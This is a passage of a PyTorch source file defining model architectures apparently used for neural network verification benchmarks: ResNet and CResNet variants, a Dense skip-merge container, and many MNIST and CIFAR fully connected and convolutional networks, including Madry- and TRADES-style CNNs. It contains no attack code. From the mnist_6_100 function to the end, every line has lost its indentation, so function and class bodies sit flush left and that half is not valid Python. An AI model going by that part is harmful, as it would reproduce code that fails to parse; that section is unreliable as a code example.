        self.layer2 = self._make_layer(block, in_planes * 2, num_blocks[1], stride=2)
        self.layer3 = self._make_layer(block, in_planes * 4, num_blocks[2], stride=2)
        self.layer4 = self._make_layer(block, in_planes * 8, num_blocks[3], stride=2)
        self.linear = nn.Linear(in_planes * 8 * block.expansion, num_classes)

    def _make_layer(self, block, planes, num_blocks, stride):
        # Only the first block of a stage may downsample; the rest use stride 1.
        strides = [stride] + [1]*(num_blocks-1)
        layers = []
        for stride in strides:
            layers.append(block(self.in_planes, planes, stride))
            self.in_planes = planes * block.expansion
        return nn.Sequential(*layers)

    def forward(self, x):
        out = F.relu(self.bn1(self.conv1(x)))
        out = self.layer1(out)
        out = self.layer2(out)
        out = self.layer3(out)
        out = self.layer4(out)
        out = F.avg_pool2d(out, 4)
        out = out.view(out.size(0), -1)
        out = self.linear(out)
        return out
def ResNet18(in_planes=2):
    # ResNet-18 layout ([2, 2, 2, 2] BasicBlocks); in_planes sets the
    # (deliberately narrow, default 2) stem width.
    return ResNet(BasicBlock, [2, 2, 2, 2], in_planes=in_planes)
class CResNet5(nn.Module):
    """Small CIFAR ResNet: stride-2 stem conv + one residual stage + head.

    ``last_layer`` selects the classifier head: "avg" (4x4 avgpool +
    linear) or "dense" (two fully connected layers).
    """
    def __init__(self, block, num_blocks=2, num_classes=10, in_planes=64, bn=True, last_layer="avg"):
        super(CResNet5, self).__init__()
        self.in_planes = in_planes
        self.bn = bn
        self.last_layer = last_layer
        self.conv1 = nn.Conv2d(3, in_planes, kernel_size=3,
                               stride=2, padding=1, bias=not self.bn)
        if self.bn:
            self.bn1 = nn.BatchNorm2d(in_planes)
        self.layer1 = self._make_layer(block, in_planes*2, num_blocks, stride=2, bn=bn, kernel=3)
        if self.last_layer == "avg":
            self.avg2d = nn.AvgPool2d(4)
            self.linear = nn.Linear(in_planes * 8 * block.expansion, num_classes)
        elif self.last_layer == "dense":
            self.linear1 = nn.Linear(in_planes * 8 * block.expansion * 16, 100)
            self.linear2 = nn.Linear(100, num_classes)
        else:
            exit("last_layer type not supported!")

    def _make_layer(self, block, planes, num_blocks, stride, bn, kernel):
        # First block may downsample; subsequent blocks run at stride 1.
        strides = [stride] + [1]*(num_blocks-1)
        layers = []
        for stride in strides:
            layers.append(block(self.in_planes, planes, stride, bn, kernel))
            self.in_planes = planes * block.expansion
        return nn.Sequential(*layers)

    def forward(self, x):
        if self.bn:
            out = F.relu(self.bn1(self.conv1(x)))
        else:
            out = F.relu(self.conv1(x))
        # print("conv1 relu", out.shape, out[0].view(-1).shape)
        out = self.layer1(out)
        # print("layer1", out.shape)
        if self.last_layer == "avg":
            out = self.avg2d(out)
            # print("avg", out.shape)
            out = out.view(out.size(0), -1)
            # print("view", out.shape)
            out = self.linear(out)
            # print("output", out.shape)
        elif self.last_layer == "dense":
            out = out.view(out.size(0), -1)
            # print("view", out.shape)
            out = F.relu(self.linear1(out))
            # print("linear1 relu", out.shape, out[0].view(-1).shape)
            out = self.linear2(out)
            # print("output", out.shape)
        return out
class CResNet7(nn.Module):
    """Like CResNet5 but with a second residual stage (same width, stride 2).

    ``last_layer`` selects the classifier head: "avg" (4x4 avgpool +
    linear) or "dense" (two fully connected layers).
    """
    def __init__(self, block, num_blocks=2, num_classes=10, in_planes=64, bn=True, last_layer="avg"):
        super(CResNet7, self).__init__()
        self.in_planes = in_planes
        self.bn = bn
        self.last_layer = last_layer
        self.conv1 = nn.Conv2d(3, in_planes, kernel_size=3,
                               stride=2, padding=1, bias=not self.bn)
        if self.bn:
            self.bn1 = nn.BatchNorm2d(in_planes)
        self.layer1 = self._make_layer(block, in_planes*2, num_blocks, stride=2, bn=bn, kernel=3)
        self.layer2 = self._make_layer(block, in_planes*2, num_blocks, stride=2, bn=bn, kernel=3)
        if self.last_layer == "avg":
            self.avg2d = nn.AvgPool2d(4)
            self.linear = nn.Linear(in_planes * 2 * block.expansion, num_classes)
        elif self.last_layer == "dense":
            self.linear1 = nn.Linear(in_planes * 2 * block.expansion * 16, 100)
            self.linear2 = nn.Linear(100, num_classes)
        else:
            exit("last_layer type not supported!")

    def _make_layer(self, block, planes, num_blocks, stride, bn, kernel):
        # First block may downsample; subsequent blocks run at stride 1.
        strides = [stride] + [1]*(num_blocks-1)
        layers = []
        for stride in strides:
            layers.append(block(self.in_planes, planes, stride, bn, kernel))
            self.in_planes = planes * block.expansion
        return nn.Sequential(*layers)

    def forward(self, x):
        if self.bn:
            out = F.relu(self.bn1(self.conv1(x)))
        else:
            out = F.relu(self.conv1(x))
        # print("conv1 relu", out.shape, out[0].view(-1).shape)
        out = self.layer1(out)
        # print("layer1", out.shape)
        out = self.layer2(out)
        # print("layer2", out.shape)
        if self.last_layer == "avg":
            out = self.avg2d(out)
            # print("avg", out.shape)
            out = out.view(out.size(0), -1)
            # print("view", out.shape)
            out = self.linear(out)
            # print("output", out.shape)
        elif self.last_layer == "dense":
            out = out.view(out.size(0), -1)
            # print("view", out.shape)
            out = F.relu(self.linear1(out))
            # print("linear1 relu", out.shape, out[0].view(-1).shape)
            out = self.linear2(out)
            # print("output", out.shape)
        return out
# ---------------------------------------------------------------------------
# Factory functions for the CResNet5 / CResNet7 families used as verification
# benchmarks.  Naming: cresnet<depth>_<in_planes>_<head>[_bn], where the head
# is "dense" (two FC layers) or "avg" (avgpool + linear).
# ---------------------------------------------------------------------------


def resnet4b():
    # 4 residual blocks (two stages of CResNet7), no BN, dense head.
    return CResNet7(BasicBlock, num_blocks=2, in_planes=16, bn=False, last_layer="dense")


def resnet2b():
    # 2 residual blocks (one stage of CResNet5), no BN, dense head.
    return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="dense")


def cresnet5_16_dense_bn():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=16, bn=True, last_layer="dense")


def cresnet5_16_avg_bn():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=16, bn=True, last_layer="avg")


def cresnet5_8_dense_bn():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=True, last_layer="dense")


def cresnet5_8_avg_bn():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=True, last_layer="avg")


def cresnet5_4_dense_bn():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=4, bn=True, last_layer="dense")


def cresnet5_4_avg_bn():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=4, bn=True, last_layer="avg")


def cresnet7_8_dense_bn():
    return CResNet7(BasicBlock, num_blocks=2, in_planes=8, bn=True, last_layer="dense")


def cresnet7_8_avg_bn():
    return CResNet7(BasicBlock, num_blocks=2, in_planes=8, bn=True, last_layer="avg")


def cresnet7_4_dense_bn():
    return CResNet7(BasicBlock, num_blocks=2, in_planes=4, bn=True, last_layer="dense")


def cresnet7_4_avg_bn():
    return CResNet7(BasicBlock, num_blocks=2, in_planes=4, bn=True, last_layer="avg")


def cresnet5_16_dense():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=16, bn=False, last_layer="dense")


def cresnet5_16_avg():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=16, bn=False, last_layer="avg")


def cresnet5_8_dense():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="dense")


def cresnet5_8_avg():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="avg")


def cresnet5_4_dense():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=4, bn=False, last_layer="dense")


def cresnet5_4_avg():
    return CResNet5(BasicBlock, num_blocks=2, in_planes=4, bn=False, last_layer="avg")


def cresnet7_8_dense():
    return CResNet7(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="dense")


def cresnet7_8_avg():
    return CResNet7(BasicBlock, num_blocks=2, in_planes=8, bn=False, last_layer="avg")


def cresnet7_4_dense():
    return CResNet7(BasicBlock, num_blocks=2, in_planes=4, bn=False, last_layer="dense")


def cresnet7_4_avg():
    return CResNet7(BasicBlock, num_blocks=2, in_planes=4, bn=False, last_layer="avg")
class Dense(nn.Module):
    """Apply several modules to the trailing call arguments and sum results.

    Given modules (W0, ..., Wk) and call arguments (x0, ..., xn), the last
    k+1 arguments are paired with the modules in order; ``None`` entries
    are skipped.  Exposes ``out_features`` when the first module has one.
    """

    def __init__(self, *Ws):
        super(Dense, self).__init__()
        self.Ws = nn.ModuleList(list(Ws))
        if len(Ws) > 0 and hasattr(Ws[0], 'out_features'):
            self.out_features = Ws[0].out_features

    def forward(self, *xs):
        tail = xs[-len(self.Ws):]
        total = 0
        for inp, W in zip(tail, self.Ws):
            if W is not None:
                total = total + W(inp)
        return total
class DenseSequential(nn.Sequential):
    """Sequential container where any module whose class name contains
    'Dense' receives the full history of intermediate outputs instead of
    just the previous layer's output."""

    def forward(self, x):
        history = [x]
        for layer in self._modules.values():
            if 'Dense' in type(layer).__name__:
                # Dense-style layers consume (a suffix of) the whole history.
                out = layer(*history)
            else:
                out = layer(history[-1])
            history.append(out)
        return history[-1]
def model_resnet(in_ch=3, in_dim=32, width=1, mult=16, N=1):
    """Residual network built from Dense/DenseSequential skip-merge layers.

    Args:
        in_ch:  input channels (3 for CIFAR, 1 for MNIST).
        in_dim: input spatial size; 28 (MNIST) gets extra stem padding.
        width:  channel multiplier inside the residual stages.
        mult:   base channel count of the stem.
        N:      number of extra residual blocks per stage.
    """
    def block(in_filters, out_filters, k, downsample):
        # A "block" is conv+ReLU followed by a Dense skip-merge conv+ReLU;
        # downsampling variants use a 4x4 stride-2 first conv and a 2x2
        # stride-2 skip conv so both paths shrink identically.
        if not downsample:
            k_first = 3
            skip_stride = 1
            k_skip = 1
        else:
            k_first = 4
            skip_stride = 2
            k_skip = 2
        return [
            Dense(nn.Conv2d(in_filters, out_filters, k_first, stride=skip_stride, padding=1)),
            nn.ReLU(),
            Dense(nn.Conv2d(in_filters, out_filters, k_skip, stride=skip_stride, padding=0),
                  None,
                  nn.Conv2d(out_filters, out_filters, k, stride=1, padding=1)),
            nn.ReLU()
        ]
    conv1 = [nn.Conv2d(in_ch, mult, 3, stride=1, padding=3 if in_dim == 28 else 1), nn.ReLU()]
    conv2 = block(mult, mult * width, 3, False)
    for _ in range(N):
        conv2.extend(block(mult * width, mult * width, 3, False))
    conv3 = block(mult * width, mult * 2 * width, 3, True)
    for _ in range(N - 1):
        conv3.extend(block(mult * 2 * width, mult * 2 * width, 3, False))
    conv4 = block(mult * 2 * width, mult * 4 * width, 3, True)
    for _ in range(N - 1):
        conv4.extend(block(mult * 4 * width, mult * 4 * width, 3, False))
    layers = (
        conv1 +
        conv2 +
        conv3 +
        conv4 +
        [Flatten(),
         nn.Linear(mult * 4 * width * 8 * 8, 1000),
         nn.ReLU(),
         nn.Linear(1000, 10)]
    )
    model = DenseSequential(
        *layers
    )
    # Kaiming-style (He) initialization for every convolution.
    for m in model.modules():
        if isinstance(m, nn.Conv2d):
            n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
            m.weight.data.normal_(0, math.sqrt(2. / n))
            if m.bias is not None:
                m.bias.data.zero_()
    return model
def mnist_fc():
    # Tiny fully connected MNIST network: 784 -> 10 -> 10 -> 10.
    model = nn.Sequential(
        Flatten(),
        nn.Linear(784, 10),
        nn.ReLU(),
        nn.Linear(10, 10),
        nn.ReLU(),
        nn.Linear(10, 10)
    )
    return model


def cifar_model_base():
    # cifar base
    model = nn.Sequential(
        nn.Conv2d(3, 8, 4, stride=2, padding=1),
        nn.ReLU(),
        nn.Conv2d(8, 16, 4, stride=2, padding=1),
        nn.ReLU(),
        Flatten(),
        nn.Linear(1024, 100),
        nn.ReLU(),
        nn.Linear(100, 10)
    )
    return model


def cifar_model_deep():
    # cifar deep
    model = nn.Sequential(
        nn.Conv2d(3, 8, 4, stride=2, padding=1),
        nn.ReLU(),
        nn.Conv2d(8, 8, 3, stride=1, padding=1),
        nn.ReLU(),
        nn.Conv2d(8, 8, 3, stride=1, padding=1),
        nn.ReLU(),
        nn.Conv2d(8, 8, 4, stride=2, padding=1),
        nn.ReLU(),
        Flatten(),
        nn.Linear(8*8*8, 100),
        nn.ReLU(),
        nn.Linear(100, 10)
    )
    return model


def cifar_model_wide():
    # cifar wide
    model = nn.Sequential(
        nn.Conv2d(3, 16, 4, stride=2, padding=1),
        nn.ReLU(),
        nn.Conv2d(16, 32, 4, stride=2, padding=1),
        nn.ReLU(),
        Flatten(),
        nn.Linear(32*8*8, 100),
        nn.ReLU(),
        nn.Linear(100, 10)
    )
    return model


# The cnn_4layer* aliases all share the cifar_model_wide architecture; the
# distinct names match differently-trained weight files in the benchmarks.
def cnn_4layer():
    # cifar_cnn_a
    return cifar_model_wide()


def cnn_4layer_adv():
    # cifar_cnn_a_adv
    return cifar_model_wide()


def cnn_4layer_adv4():
    # cifar_cnn_a_adv4 (original comment said "cifar_cnn_a_adv"; same architecture either way)
    return cifar_model_wide()


def cnn_4layer_mix4():
    # cifar_cnn_a_mix4
    return cifar_model_wide()


def cnn_4layer_b():
    # cifar_cnn_b
    return nn.Sequential(
        nn.ZeroPad2d((1, 2, 1, 2)),
        nn.Conv2d(3, 32, (5, 5), stride=2, padding=0),
        nn.ReLU(),
        nn.Conv2d(32, 128, (4, 4), stride=2, padding=1),
        nn.ReLU(),
        Flatten(),
        nn.Linear(8192, 250),
        nn.ReLU(),
        nn.Linear(250, 10),
    )


def cnn_4layer_b4():
    # cifar_cnn_b4 (identical architecture to cnn_4layer_b)
    return cnn_4layer_b()


def mnist_cnn_4layer():
    # mnist_cnn_a
    return nn.Sequential(
        nn.Conv2d(1, 16, (4, 4), stride=2, padding=1),
        nn.ReLU(),
        nn.Conv2d(16, 32, (4, 4), stride=2, padding=1),
        nn.ReLU(),
        Flatten(),
        nn.Linear(1568, 100),
        nn.ReLU(),
        nn.Linear(100, 10),
    )
def cifar_conv_small():
    # Two stride-2 convs (no padding) + two FC layers.
    model = nn.Sequential(
        nn.Conv2d(3, 16, 4, stride=2, padding=0),
        nn.ReLU(),
        nn.Conv2d(16, 32, 4, stride=2, padding=0),
        nn.ReLU(),
        Flatten(),
        nn.Linear(32*6*6, 100),
        nn.ReLU(),
        nn.Linear(100, 10)
    )
    return model


def cifar_conv_big():
    # Four convs (alternating stride 1/2) + three FC layers.
    model = nn.Sequential(
        nn.Conv2d(3, 32, 3, stride=1, padding=1),
        nn.ReLU(),
        nn.Conv2d(32, 32, 4, stride=2, padding=1),
        nn.ReLU(),
        nn.Conv2d(32, 64, 3, stride=1, padding=1),
        nn.ReLU(),
        nn.Conv2d(64, 64, 4, stride=2, padding=1),
        nn.ReLU(),
        Flatten(),
        nn.Linear(64*8*8, 512),
        nn.ReLU(),
        nn.Linear(512, 512),
        nn.ReLU(),
        nn.Linear(512, 10)
    )
    return model


# The cifar_marabou_* models share one layout and differ only in conv widths
# (8/16 -> 16/32 -> 32/64).
def cifar_marabou_small():
    model = nn.Sequential(
        nn.Conv2d(3, 8, 4, stride=2),
        nn.ReLU(),
        nn.Conv2d(8, 16, 4, stride=2,),
        nn.ReLU(),
        Flatten(),
        nn.Linear(576, 128),
        nn.ReLU(),
        nn.Linear(128, 64),
        nn.ReLU(),
        nn.Linear(64, 10)
    )
    return model


def cifar_marabou_medium():
    model = nn.Sequential(
        nn.Conv2d(3, 16, 4, stride=2),
        nn.ReLU(),
        nn.Conv2d(16, 32, 4, stride=2,),
        nn.ReLU(),
        Flatten(),
        nn.Linear(1152, 128),
        nn.ReLU(),
        nn.Linear(128, 64),
        nn.ReLU(),
        nn.Linear(64, 10)
    )
    return model


def cifar_marabou_large():
    model = nn.Sequential(
        nn.Conv2d(3, 32, 4, stride=2),
        nn.ReLU(),
        nn.Conv2d(32, 64, 4, stride=2,),
        nn.ReLU(),
        Flatten(),
        nn.Linear(2304, 128),
        nn.ReLU(),
        nn.Linear(128, 64),
        nn.ReLU(),
        nn.Linear(64, 10)
    )
    return model


def mnist_conv_small():
    # MNIST twin of cifar_conv_small (1 input channel, 5x5 final feature map).
    model = nn.Sequential(
        nn.Conv2d(1, 16, 4, stride=2, padding=0),
        nn.ReLU(),
        nn.Conv2d(16, 32, 4, stride=2, padding=0),
        nn.ReLU(),
        Flatten(),
        nn.Linear(32*5*5, 100),
        nn.ReLU(),
        nn.Linear(100, 10)
    )
    return model


def mnist_conv_big():
    # MNIST twin of cifar_conv_big (1 input channel, 7x7 final feature map).
    model = nn.Sequential(
        nn.Conv2d(1, 32, 3, stride=1, padding=1),
        nn.ReLU(),
        nn.Conv2d(32, 32, 4, stride=2, padding=1),
        nn.ReLU(),
        nn.Conv2d(32, 64, 3, stride=1, padding=1),
        nn.ReLU(),
        nn.Conv2d(64, 64, 4, stride=2, padding=1),
        nn.ReLU(),
        Flatten(),
        nn.Linear(64*7*7, 512),
        nn.ReLU(),
        nn.Linear(512, 512),
        nn.ReLU(),
        nn.Linear(512, 10)
    )
    return model
def mnist_6_100():
model = nn.Sequential(
Flatten(),
nn.Linear(784,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100, 10),
# nn.ReLU(),
# nn.Linear(10,10, bias=False)
)
return model
def mnist_9_100():
model = nn.Sequential(
Flatten(),
nn.Linear(784,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,100),
nn.ReLU(),
nn.Linear(100,10),
# nn.ReLU(),
# nn.Linear(10,10, bias=False)
)
return model
def mnist_6_200():
model = nn.Sequential(
Flatten(),
nn.Linear(784,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,10),
# nn.ReLU(),
# nn.Linear(10,10, bias=False)
)
return model
def mnist_9_200():
model = nn.Sequential(
Flatten(),
nn.Linear(784,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,200),
nn.ReLU(),
nn.Linear(200,10),
# nn.ReLU(),
# nn.Linear(10,10, bias=False)
)
return model
def mnist_fc1():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 200),
nn.ReLU(),
nn.Linear(200, 200),
nn.ReLU(),
nn.Linear(200, 200),
nn.ReLU(),
nn.Linear(200, 200),
nn.ReLU(),
nn.Linear(200, 200),
nn.ReLU(),
nn.Linear(200, 10)
)
return model
def mnist_fc2():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def mnist_fc3():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def mnist_fc_3_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_fc_4_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_fc_5_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_fc_6_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_fc_7_512():
model = nn.Sequential(
Flatten(),
nn.Linear(784, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def mnist_madry_secret():
model = nn.Sequential(
nn.Conv2d(1, 32, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
nn.Conv2d(32, 64, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(64*7*7,1024),
nn.ReLU(),
nn.Linear(1024, 10)
)
return model
def cifar_conv1():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(1024, 200),
nn.ReLU(),
nn.Linear(200, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cifar_conv2():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(512, 200),
nn.ReLU(),
nn.Linear(200, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cifar_conv3():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(2048, 200),
nn.ReLU(),
nn.Linear(200, 100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def cifar_conv4():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def cifar_conv5():
model = nn.Sequential(
nn.Conv2d(3, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(2048, 1024),
nn.ReLU(),
nn.Linear(1024, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def cifar_conv6():
model = nn.Sequential(
nn.Conv2d(3, 8, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(8, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10)
)
return model
def MadryCNN():
return nn.Sequential(
nn.Conv2d(1, 32, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
nn.Conv2d(32, 64, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(64*7*7,1024),
nn.ReLU(),
nn.Linear(1024, 10)
)
def MadryCNN_one_maxpool():
return nn.Sequential(
nn.Conv2d(1, 32, 5, stride=2, padding=2),
nn.ReLU(),
nn.Conv2d(32, 64, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(64*7*7,1024),
nn.ReLU(),
nn.Linear(1024, 10)
)
def MadryCNN_no_maxpool():
return nn.Sequential(
nn.Conv2d(1, 32, 5, stride=2, padding=2),
nn.ReLU(),
nn.Conv2d(32, 64, 5, stride=2, padding=2),
nn.ReLU(),
Flatten(),
nn.Linear(64*7*7,1024),
nn.ReLU(),
nn.Linear(1024, 10)
)
def MadryCNN_tiny():
return nn.Sequential(
nn.Conv2d(1, 4, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
nn.Conv2d(4, 8, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(8*7*7,128),
nn.ReLU(),
nn.Linear(128, 10)
)
def MadryCNN_one_maxpool_tiny():
return nn.Sequential(
nn.Conv2d(1, 4, 5, stride=2, padding=2),
nn.ReLU(),
nn.Conv2d(4, 8, 5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(2, stride=2),
Flatten(),
nn.Linear(8*7*7,128),
nn.ReLU(),
nn.Linear(128, 10)
)
def MadryCNN_no_maxpool_tiny():
return nn.Sequential(
nn.Conv2d(1, 4, 5, stride=2, padding=2),
nn.ReLU(),
nn.Conv2d(4, 8, 5, stride=2, padding=2),
nn.ReLU(),
Flatten(),
nn.Linear(8*7*7,128),
nn.ReLU(),
nn.Linear(128, 10)
)
class TradesCNN(nn.Module):
def __init__(self, drop=0.5):
super().__init__()
self.num_channels = 1
self.num_labels = 10
activ = nn.ReLU(True)
self.feature_extractor = nn.Sequential(OrderedDict([
('conv1', nn.Conv2d(self.num_channels, 32, 3)),
('relu1', activ),
('conv2', nn.Conv2d(32, 32, 3)),
('relu2', activ),
('maxpool1', nn.MaxPool2d(2, 2)),
('conv3', nn.Conv2d(32, 64, 3)),
('relu3', activ),
('conv4', nn.Conv2d(64, 64, 3)),
('relu4', activ),
('maxpool2', nn.MaxPool2d(2, 2)),
]))
self.classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(64 * 4 * 4, 200)),
('relu1', activ),
('drop', nn.Dropout(drop)),
('fc2', nn.Linear(200, 200)),
('relu2', activ),
('fc3', nn.Linear(200, self.num_labels)),
]))
for m in self.modules():
if isinstance(m, (nn.Conv2d)):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
nn.init.constant_(self.classifier.fc3.weight, 0)
nn.init.constant_(self.classifier.fc3.bias, 0)
def forward(self, input):
features = self.feature_extractor(input)
logits = self.classifier(features.view(-1, 64 * 4 * 4))
return logits
class TradesCNN_one_maxpool(nn.Module):
def __init__(self, drop=0.5):
super().__init__()
self.num_channels = 1
self.num_labels = 10
activ = nn.ReLU(True)
self.feature_extractor = nn.Sequential(OrderedDict([
('conv1', nn.Conv2d(self.num_channels, 32, 3)),
('relu1', activ),
('conv2', nn.Conv2d(32, 32, 3, stride=2)),
('relu2', activ),
('conv3', nn.Conv2d(32, 64, 3)),
('relu3', activ),
('conv4', nn.Conv2d(64, 64, 3)),
('relu4', activ),
('maxpool2', nn.MaxPool2d(2, 2)),
]))
self.classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(64 * 4 * 4, 200)),
('relu1', activ),
('drop', nn.Dropout(drop)),
('fc2', nn.Linear(200, 200)),
('relu2', activ),
('fc3', nn.Linear(200, self.num_labels)),
]))
for m in self.modules():
if isinstance(m, (nn.Conv2d)):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
nn.init.constant_(self.classifier.fc3.weight, 0)
nn.init.constant_(self.classifier.fc3.bias, 0)
def forward(self, input):
features = self.feature_extractor(input)
logits = self.classifier(features.view(-1, 64 * 4 * 4))
return logits
class TradesCNN_no_maxpool(nn.Module):
def __init__(self, drop=0.5):
super().__init__()
self.num_channels = 1
self.num_labels = 10
activ = nn.ReLU(True)
self.feature_extractor = nn.Sequential(OrderedDict([
('conv1', nn.Conv2d(self.num_channels, 32, 3)),
('relu1', activ),
('conv2', nn.Conv2d(32, 32, 3, stride=2)),
('relu2', activ),
('conv3', nn.Conv2d(32, 64, 3)),
('relu3', activ),
('conv4', nn.Conv2d(64, 64, 3, stride=2)),
('relu4', activ),
]))
self.classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(64 * 4 * 4, 200)),
('relu1', activ),
('drop', nn.Dropout(drop)),
('fc2', nn.Linear(200, 200)),
('relu2', activ),
('fc3', nn.Linear(200, self.num_labels)),
]))
for m in self.modules():
if isinstance(m, (nn.Conv2d)):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
nn.init.constant_(self.classifier.fc3.weight, 0)
nn.init.constant_(self.classifier.fc3.bias, 0)
def forward(self, input):
features = self.feature_extractor(input)
logits = self.classifier(features.view(-1, 64 * 4 * 4))
return logits
